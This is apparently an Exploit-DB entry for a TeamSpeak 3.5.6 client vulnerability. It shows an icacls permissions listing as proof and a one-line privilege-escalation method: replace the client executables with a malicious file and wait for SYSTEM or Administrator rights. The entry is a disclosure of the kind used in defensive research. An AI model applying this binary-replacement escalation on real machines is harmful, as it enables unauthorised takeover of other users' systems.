a300bd948f
8 changes to exploits/shellcodes TeamSpeak 3.5.6 - Insecure File Permissions Emerson PAC Machine Edition 9.80 Build 8695 - 'TrapiServer' Unquoted Service Path H3C SSL VPN - Username Enumeration Multi-Vendor Online Groceries Management System 1.0 - 'id' Blind SQL Injection Simple Student Quarterly Result/Grade System 1.0 - SQLi Authentication Bypass ServiceNow - Username Enumeration Network Video Recorder NVR304-16EP - Reflected Cross-Site Scripting (XSS) (Unauthenticated) WordPress Plugin Error Log Viewer 1.1.1 - Arbitrary File Clearing (Authenticated)
60 lines
No EOL
2.5 KiB
Text
60 lines
No EOL
2.5 KiB
Text
# Exploit Title: TeamSpeak 3.5.6 - Insecure File Permissions
|
|
# Date: 2022-02-15
|
|
# Exploit Author: Aryan Chehreghani
|
|
# Contact: aryanchehreghani@yahoo.com
|
|
# Vendor Homepage: https://www.teamspeak.com
|
|
# Software Link: https://www.teamspeak.com/en/downloads
|
|
# Version: 3.5.6
|
|
# Tested on: Windows 10 x64
|
|
|
|
# [ About - TeamSpeak ]:
|
|
#TeamSpeak (TS) is a proprietary voice-over-Internet Protocol (VoIP),
|
|
#application for audio communication between users on a chat channel,
|
|
#much like a telephone conference call, Users typically use headphones with a microphone,
|
|
#The client software connects to a TeamSpeak server of the user's choice from which the user may join chat channels,
|
|
#The target audience for TeamSpeak is gamers, who can use the software to communicate,
|
|
#with other players on the same team of a multiplayer video game,
|
|
#Communicating by voice gives a competitive advantage by enabling players to keep their hands on the controls.
|
|
|
|
# [ Description ]:
|
|
#The TeamSpeak Application was installed with insecure file permissions.
|
|
#It was found that all folder and file permissions were incorrectly configured during installation.
|
|
#It was possible to replace the service binary.
|
|
|
|
# [ POC ]:
|
|
|
|
C:\Users\user\AppData\Local\TeamSpeak 3 Client>icacls *.exe
|
|
|
|
createfileassoc.exe NT AUTHORITY\SYSTEM:(F)
|
|
BUILTIN\Administrators:(F)
|
|
WIN-FREMP1UB3LB\Administrator:(F)
|
|
|
|
error_report.exe NT AUTHORITY\SYSTEM:(F)
|
|
BUILTIN\Administrators:(F)
|
|
WIN-FREMP1UB3LB\Administrator:(F)
|
|
|
|
package_inst.exe NT AUTHORITY\SYSTEM:(F)
|
|
BUILTIN\Administrators:(F)
|
|
WIN-FREMP1UB3LB\Administrator:(F)
|
|
|
|
QtWebEngineProcess.exe NT AUTHORITY\SYSTEM:(F)
|
|
BUILTIN\Administrators:(F)
|
|
WIN-FREMP1UB3LB\Administrator:(F)
|
|
|
|
ts3client_win32.exe NT AUTHORITY\SYSTEM:(F)
|
|
BUILTIN\Administrators:(F)
|
|
WIN-FREMP1UB3LB\Administrator:(F)
|
|
|
|
Uninstall.exe NT AUTHORITY\SYSTEM:(F)
|
|
BUILTIN\Administrators:(F)
|
|
WIN-FREMP1UB3LB\Administrator:(F)
|
|
|
|
update.exe NT AUTHORITY\SYSTEM:(F)
|
|
BUILTIN\Administrators:(F)
|
|
WIN-FREMP1UB3LB\Administrator:(F)
|
|
|
|
Successfully processed 7 files; Failed processing 0 files
|
|
|
|
# [ Exploit - Privilege Escalation ]:
|
|
#Replace ts3client_win32.exe,update.exe,package_inst.exe,QtWebEngineProcess.exe,createfileassoc.exe and other ...
|
|
#with any executable malicious file you want then wait and get SYSTEM or Administrator rights (Privilege Escalation) |